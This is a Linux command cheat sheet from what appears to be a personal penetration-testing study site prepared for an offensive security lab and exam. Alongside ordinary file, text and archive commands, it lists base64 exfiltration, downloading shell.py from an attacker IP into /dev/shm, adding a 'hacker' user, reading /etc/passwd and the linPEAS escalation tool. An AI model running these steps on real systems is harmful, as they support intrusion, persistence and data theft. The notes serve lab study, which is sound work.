Linux

PE Tool
Commands
PEASS-ng/linPEAS at master · carlospolop/PEASS-ng
GitHub
​
#Exfiltration using Base64
base64 -w 0 file
​
#find a file 
find -maxdepth 1 
find ./ -type f  
find ./ -type d 
find ./ -name abc* 
grep -lR password *.txt 
find ./ -name webmin 2>/dev/null 
​
#query file grep functions
cut –d ":" -f 1 /etc/passwd 
echo "hello::there::firend" | awk –F "::" '{print $1, $3}' 
cat access.log | cut –d " " -f 1 | sort | uniq –c |sort –urn 
​
#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'
​
#Count
wc -l <file> #Lines
wc -c #Chars
​
#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates
​
​
#Compare File 
comm fileA.txt fileB.txt 
​
#Download 
wget 10.10.14.14:8000/shell.py 
curl -vvv 'https://10.10.14.14:8000/shell.py' -b "cookie" -k -o /dev/shm/shell.py
-k =>  tag in the end to disable ssl checks done by curl
​
#Unzipp
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz
​
#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker  
​
​
#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80
​
##Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
​
#Send Email
sendEmail -t [email protected] -f [email protected] -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
​
#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob
​
​

Useful Command/Tools - Previous

Windows

Next - Offensive Security Lab & Exam

Lab

Last modified 5mo ago

Copy link